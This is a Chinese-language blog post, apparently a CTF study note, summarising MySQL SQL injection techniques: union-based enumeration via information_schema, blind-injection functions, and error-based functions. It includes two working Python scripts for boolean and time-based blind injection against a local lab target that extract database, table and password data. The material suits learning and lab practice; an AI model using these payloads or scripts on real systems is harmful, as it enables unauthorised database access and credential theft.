<!DOCTYPE html>
<html lang="zh-CN">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="lexsd6" />



<meta name="description" content="sql注入产生的原因是未对用户输入进行处理，导致输入的恶意信息与后端设定的sql语句进行拼接时产生了歧义，使得用户可以控制该条sql语句与数据库进行通信。">
<meta property="og:type" content="article">
<meta property="og:title" content="关于SQL注入小记">
<meta property="og:url" content="lexsd6.github.io/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="lexsd6&#39;s home">
<meta property="og:description" content="sql注入产生的原因是未对用户输入进行处理，导致输入的恶意信息与后端设定的sql语句进行拼接时产生了歧义，使得用户可以控制该条sql语句与数据库进行通信。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-08-12T03:49:06.454Z">
<meta property="article:modified_time" content="2020-08-31T09:50:31.780Z">
<meta property="article:author" content="lexsd6">
<meta property="article:tag" content="web">
<meta property="article:tag" content="sql">
<meta name="twitter:card" content="summary">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="lexsd6&#39;s home" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>关于SQL注入小记 | lexsd6&#39;s home</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 4.2.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/lexsd6.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">lexsd6</a></h1>
        </hgroup>

        
        <p class="header-subtitle"> Clumsy birds have to start flying early</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:lexsd6@foxmail.com" title="Email"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa QQ" href="tencent://message/?uin=2927507170&Menu=yes" title="QQ"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/" rel="tag">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/crypto/" rel="tag">crypto</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mysql/" rel="tag">mysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/" rel="tag">sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io" target="_blank" rel="noopener">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/" target="_blank" rel="noopener">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/" target="_blank" rel="noopener">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">一梦想成为五边形战士的老菜鸡</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">lexsd6</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/lexsd6.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">lexsd6</a></h1>
            </hgroup>
            
            <p class="header-subtitle"> Clumsy birds have to start flying early</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:lexsd6@foxmail.com" title="Email"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa QQ" target="_blank" href="tencent://message/?uin=2927507170&Menu=yes" title="QQ"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-SQL注入总结" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/" class="article-date">
      <time datetime="2020-08-12T03:49:06.454Z" itemprop="datePublished">2020-08-12</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      关于SQL注入小记
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/sql/" rel="tag">sql</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>sql注入产生的原因是未对用户输入进行处理，导致输入的恶意信息与后端设定的sql语句进行拼接时产生了歧义，使得用户可以控制该条sql语句与数据库进行通信。</p>
<a id="more"></a>

<h2 id="sql注入思路"><a href="#sql注入思路" class="headerlink" title="sql注入思路"></a>sql注入思路</h2><p>1.寻找注入点</p>
<p>2.确定注入类型</p>
<p>​     1)若页面有明显变化:联合查询注入。</p>
<p>​     2)若页面有报错回显:报错注入。</p>
<p>​     3)只用正确与错误的回显或无回显:盲注(布尔盲注,时间盲注)。</p>
<p>3.利用自带函数查询数据库信息.database()查询当前数据库名、user()查数据库用户、version()查数据库版本等。</p>
<p>4.查库名-&gt;查表名-&gt;查字段名-&gt;查数据 ,以达到目的.</p>
<h2 id="联合查询注入步骤"><a href="#联合查询注入步骤" class="headerlink" title="联合查询注入步骤"></a>联合查询注入步骤</h2><h3 id="1-用二分法确定字段数量"><a href="#1-用二分法确定字段数量" class="headerlink" title="1)用二分法确定字段数量"></a>1)用二分法确定字段数量</h3><p>使用<code>order/group by</code>语句。通过往后边拼接数字，可确定字段数量，若大于，则页面错误/无内容，若小于或等于，则页面正常从而找到字段的数量。</p>
<h3 id="2-判断页面回显数据的字段位置"><a href="#2-判断页面回显数据的字段位置" class="headerlink" title="2)判断页面回显数据的字段位置"></a>2)判断页面回显数据的字段位置</h3><p>使用union select 1,2,3,4,x… 我们定义的数字将显示在页面上，即可从中页面显示的数字所在的位置推断出可以利用的字符串的位置。</p>
<h3 id="3-利用sql内置函数进行信息收集"><a href="#3-利用sql内置函数进行信息收集" class="headerlink" title="3)利用sql内置函数进行信息收集"></a>3)利用sql内置函数进行信息收集</h3><p>database()查询当前数据库名、user()查询数据库账号、version()查询数据库版本等基本情况，再根据不同的版本、不同的权限确定接下来的方法。</p>
<h3 id="4-1-若Mysql版本-gt-5-0"><a href="#4-1-若Mysql版本-gt-5-0" class="headerlink" title="4.1)若Mysql版本&gt;=5.0"></a>4.1)若Mysql版本&gt;=5.0</h3><p>MySQL 5.0以上版本存在一个存储着数据库信息的信息数据库 information_schema ，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。 </p>
<p>具体而言:</p>
<p>SCHEMATA</p>
<p>储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等</p>
<p>TABLES</p>
<p>储存mysql中的表信息，包括这个表是基本表还是系统表，数据库的引擎是什么，表有多少行，创建时间，最后更新时间等</p>
<p>COLUMNS</p>
<p>储存mysql中表的列信息，包括这个表的所有列以及每个列的信息，该列是表中的第几列，列的数据类型，列的编码类型，列的权限，列的注释等</p>
<h4 id="1-查询数据库中的所有库名"><a href="#1-查询数据库中的所有库名" class="headerlink" title="(1)查询数据库中的所有库名"></a>(1)查询数据库中的所有库名</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span>  schema_name <span class="keyword">FROM</span> information_schema.schemata</span><br></pre></td></tr></table></figure>

<h4 id="2-获取数据库中的表"><a href="#2-获取数据库中的表" class="headerlink" title="(2)获取数据库中的表"></a>(2)获取数据库中的表</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()</span><br></pre></td></tr></table></figure>

<h4 id="3-获取数据库中的表"><a href="#3-获取数据库中的表" class="headerlink" title="(3)获取数据库中的表"></a>(3)获取数据库中的表</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 1,2,group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;(table_name)#此表名可以为字符串型，也可以十六进制表示</span><br></pre></td></tr></table></figure>

<h4 id="4-获取信息"><a href="#4-获取信息" class="headerlink" title="(4)获取信息"></a>(4)获取信息</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select null,group_concat(*) from table_name</span><br><span class="line">(or)</span><br><span class="line">select null,group_concat(&#39;column_name&#39;) from (&#39;table_name&#39;)</span><br></pre></td></tr></table></figure>

<h3 id="4-2-Mysql版本-lt-5-0"><a href="#4-2-Mysql版本-lt-5-0" class="headerlink" title="4.2)Mysql版本&lt;5.0"></a>4.2)Mysql版本&lt;5.0</h3><p>mysql的低版本缺乏系统库information_schema，我们无法直接查询表名，字段(列)名等信息，这时候只能靠猜或是通过盲注.</p>
<h2 id="盲注的方法"><a href="#盲注的方法" class="headerlink" title="盲注的方法"></a>盲注的方法</h2><p>在提交时，正确页面与错误页面相比有变化，则使用布尔的盲注。正确页面与错误页面无变化，使用时间注入。</p>
<p>但无论是布尔还时间都会用到，下面盲注常用的函数：<br>        (1)length(str) ：返回字符串str的长度</p>
<p>(2)substr(str, pos, len) ：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始</p>
<p>(3)mid(str,pos,len) ：跟上面的一样，截取字符串</p>
<p>(4)ascii(str) ：返回字符串str的最左面字符的ASCII代码值</p>
<p>(5)ord(str) ：将字符或布尔类型转成ascll码</p>
<p>(6)if(a,b,c) ：a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0</p>
<h4 id="布尔注入"><a href="#布尔注入" class="headerlink" title="布尔注入"></a>布尔注入</h4><p>通过构造substr或mid函数来，截取返回值的结果中某一个字符。再利正确页面与错误页面不同的特性，来枚举出来。</p>
<p>布尔注入脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">lenth</span><span class="params">(sql,jiao)</span>:</span><span class="comment">#爆破长度</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span>(len(requests.get(<span class="string">'http://192.168.14.137/Less-2/?id=1 and length(('</span>+sql+<span class="string">'))&gt;'</span>+str(i)).text))==jiao:</span><br><span class="line">             <span class="keyword">return</span> (i)</span><br><span class="line">            </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">substrchr</span><span class="params">(sql,jiao,strlen)</span>:</span><span class="comment">#爆破内容</span></span><br><span class="line">    w=<span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,strlen+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            <span class="keyword">if</span>(len(requests.get(<span class="string">'http://192.168.14.137/Less-2/?id=1 and ascii(substr(('</span>+sql+<span class="string">'),'</span>+str(k)+<span class="string">',1))&gt;'</span>+str(i)).text))==jiao:                </span><br><span class="line">                w=w+chr(i)</span><br><span class="line">                print(chr(i),end=<span class="string">''</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> (w)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#zheng=len(requests.get('http://192.168.14.137/Less-2/?id=1').text)#721</span></span><br><span class="line"></span><br><span class="line">jiao=len(requests.get(<span class="string">'http://192.168.14.137/Less-2/?id=1 and length(database())&gt;1111'</span>).text)<span class="comment">#670</span></span><br><span class="line"><span class="comment">#sql='select database()' //爆当前库名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(schema_name) from information_schema.schemata' #爆所有库名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(table_name) from information_schema.tables where table_schema=database()'#爆库中所有表名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"'#爆表中所有字段名</span></span><br><span class="line">sql=<span class="string">'select group_concat(password) from users'</span> <span class="comment">#爆内容</span></span><br><span class="line"></span><br><span class="line">w=lenth(sql,jiao)</span><br><span class="line"></span><br><span class="line">w=substrchr(sql,jiao,w)</span><br></pre></td></tr></table></figure>



<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>通过判断页面返回内容的响应时间差异进行条件判断。通常可利用的产生时间延迟的函数有：sleep()、benchmark()，还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。</p>
<p>简单的时间盲注入脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">lenth</span><span class="params">(sql)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">         start=time.time()</span><br><span class="line">         requests.get(<span class="string">'http://192.168.14.137/Less-2/?id=1 and if(length(('</span>+sql+<span class="string">'))&gt;'</span>+str(i)+<span class="string">',1,sleep(3) )'</span>)</span><br><span class="line">    </span><br><span class="line">         <span class="keyword">if</span>((time.time()-start)&gt;<span class="number">3</span>):</span><br><span class="line">             print(<span class="string">'长度是'</span>+str(i))</span><br><span class="line">             <span class="keyword">return</span> (i)</span><br><span class="line">            </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">substrchr</span><span class="params">(sql,strlen)</span>:</span></span><br><span class="line">    w=<span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,strlen+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">             start=time.time()</span><br><span class="line">             requests.get(<span class="string">'http://192.168.14.137/Less-2/?id=1 and if(ascii(substr(('</span>+sql+<span class="string">'),'</span>+str(k)+<span class="string">',1))&gt;'</span>+str(i)+<span class="string">',1,sleep(2))'</span>)</span><br><span class="line">             </span><br><span class="line">             <span class="keyword">if</span>((time.time()-start)&gt;<span class="number">2</span>):              </span><br><span class="line">                w=w+chr(i)</span><br><span class="line">                print(chr(i),end=<span class="string">''</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> (w)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#sql='select database()' #爆当前库名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(schema_name) from information_schema.schemata' #爆所有库名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(table_name) from information_schema.tables where table_schema=database()'#爆库中所有表名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"'#爆表中所有字段名</span></span><br><span class="line"><span class="comment">#sql='select group_concat(password) from users' #爆内容</span></span><br><span class="line"></span><br><span class="line">long=lenth(sql)</span><br><span class="line"></span><br><span class="line">text=substrchr(sql,long)</span><br></pre></td></tr></table></figure>

<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p>通过特殊函数的错误使用使其参数被页面输出。</p>
<p>前提：服务器开启报错信息返回，也就是发生错误时返回报错信息。</p>
<p>常见的利用函数有：exp()、floor()+rand()、updatexml()、extractvalue()等</p>
<p><a href="https://lexsd6.github.io/2019/11/13/%E5%85%B3%E4%BA%8Eupdatexml()%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E7%9A%84%E6%80%9D%E8%80%83/">关于updatexml()报错注入</a></p>
<p>报错函数通常尤其最长报错输出的限制，面对这种情况，可以进行分割输出。特殊函数的特殊参数进运行一个字段、一行数据的返回，使用group_concat等函数聚合数据即可。</p>
<h2 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h2><p><a href="https://xz.aliyun.com/t/7169#toc-53" target="_blank" rel="noopener">对MYSQL注入相关内容及部分Trick的归类小结</a></p>
<p><a href="https://xz.aliyun.com/t/2869" target="_blank" rel="noopener">SQL 注入绕过</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">关于SQL注入小记</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">lexsd6</a></p>
        <p><span>发布时间:</span>2020-08-12, 11:49:06</p>
        <p><span>最后更新:</span>2020-08-31, 17:50:31</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/" title="关于SQL注入小记">lexsd6.github.io/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/</a>
            <span class="copy-path" data-clipboard-text="原文: lexsd6.github.io/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/　　作者: lexsd6" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2020/07/26/%E5%AE%89%E6%81%92DASCTF%207%E6%9C%88%E8%B5%9BWP/">
                    安恒DASCTF 7月赛WP
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#sql注入思路"><span class="toc-text">sql注入思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#联合查询注入步骤"><span class="toc-text">联合查询注入步骤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-用二分法确定字段数量"><span class="toc-text">1)用二分法确定字段数量</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-判断页面回显数据的字段位置"><span class="toc-text">2)判断页面回显数据的字段位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-利用sql内置函数进行信息收集"><span class="toc-text">3)利用sql内置函数进行信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-1-若Mysql版本-gt-5-0"><span class="toc-text">4.1)若Mysql版本&gt;&#x3D;5.0</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-查询数据库中的所有库名"><span class="toc-text">(1)查询数据库中的所有库名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-获取数据库中的表"><span class="toc-text">(2)获取数据库中的表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-获取数据库中的表"><span class="toc-text">(3)获取数据库中的表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-获取信息"><span class="toc-text">(4)获取信息</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-2-Mysql版本-lt-5-0"><span class="toc-text">4.2)Mysql版本&lt;5.0</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#盲注的方法"><span class="toc-text">盲注的方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#布尔注入"><span class="toc-text">布尔注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#时间盲注"><span class="toc-text">时间盲注</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#报错注入"><span class="toc-text">报错注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考文献"><span class="toc-text">参考文献</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-4 i,
        .toc-level-4 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"关于SQL注入小记　| lexsd6's home　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2020/07/26/%E5%AE%89%E6%81%92DASCTF%207%E6%9C%88%E8%B5%9BWP/" title="下一篇: 安恒DASCTF 7月赛WP">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/08/12/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">关于SQL注入小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/26/%E5%AE%89%E6%81%92DASCTF%207%E6%9C%88%E8%B5%9BWP/">安恒DASCTF 7月赛WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/07/15/rgbCTF--wp/">sctf2020 pythonbox题目复现小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/22/%E5%AF%B9linux%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E6%80%BB%E7%BB%93/">对linux 命令执行的总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/06/18/NahamCon%20CTF%20WP/">NahamCon CTF WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/31/%E5%AF%B9%E4%BA%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%9F%A5%E8%AF%86%E6%A2%B3%E7%90%86/">对于文件包含漏洞的知识梳理</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/26/%E5%85%B3%E4%BA%8Ephp%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于php反序列化字符逃逸的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/23/%E5%A6%82%E4%BD%95%E8%AE%A9%E6%96%87%E4%BB%B6%E9%87%8CPHP%E4%BB%A3%E7%A0%81%E8%A2%AB%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%89%A7%E8%A1%8C/">如何让文件里PHP代码被服务器解析执行</a></li><li class="post-list-item"><a class="post-list-link" 